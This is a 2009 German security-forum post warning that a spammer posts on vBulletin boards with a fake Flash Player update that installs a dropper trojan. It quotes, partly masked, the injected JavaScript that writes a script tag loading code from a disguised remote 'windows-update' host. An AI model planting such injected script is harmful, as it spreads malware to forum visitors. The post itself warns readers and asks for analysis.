Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)
-   -   Scriptkiddie in Foren unterwegs... (https://www.trojaner-board.de/75513-scriptkiddie-foren-unterwegs.html)

AnaJu-Hunter 20.07.2009 01:26

Scriptkiddie in Foren unterwegs...
 
Mahlzeit!

Momentan ist in diversen vBulletin®Foren ein Sctiptkiddie unterwegs. Der User registriert sich momentan in sämtlichen Foren, meistens als "AnaJu" und verteilt seine Beiträge.

Sollten bei Euch beim Anklicken eines Beitrages Updatehinweise für ein "dringendes Sicherheitsupdate" für den "Adobe Flash Player" aufgehen und ein Programmdownload aufgehen - nicht annehmen.

Es handelt sich dabei um ein Script, welches anscheinend in erster Linie über vBulletin® Foren verbreitet werden soll und welches sich weitere Programme aus dem Internet nachladen soll. Antivir z.B. erkennt diese datei als 'TR/Dropper.Gen'

Es würde mich nicht wundern, wenn er hier im Forum auch auftauchen wird. Bisher scheint er vom Münzforum über Autos und Militaria alles durch zu haben....

Vielleicht ist er hier ja auch schon jemandem irgendwo aufgefallen. Ich hab nur noch nicht so ganz raus, warum er das so exessiv betreibt.... Mag sein, dass er ein Bot-Netz bilden will....

Das Script sieht folgendermaßen aus:
<!-- message -->
<div id="post_message_617519">

HIER STEHT DER TEXT<br />

<br />
<XXXXXX language='JavaScript' type='text/javascript'>document.write("<" + "script language='JavaScript' type='text/javascript' src='http://windows-updatXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXyz147fYlWXU4mn5R3Pg?rand=" + Math.random() * 100000000 +"'></"+"script>")</script>
</div>
<div align="center">
</div>
<!-- / message -->



Vielleicht hat ja noch jemand ne Idee, was es damit aufsich hat....


Alle Zeitangaben in WEZ +1. Es ist jetzt 04:35 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131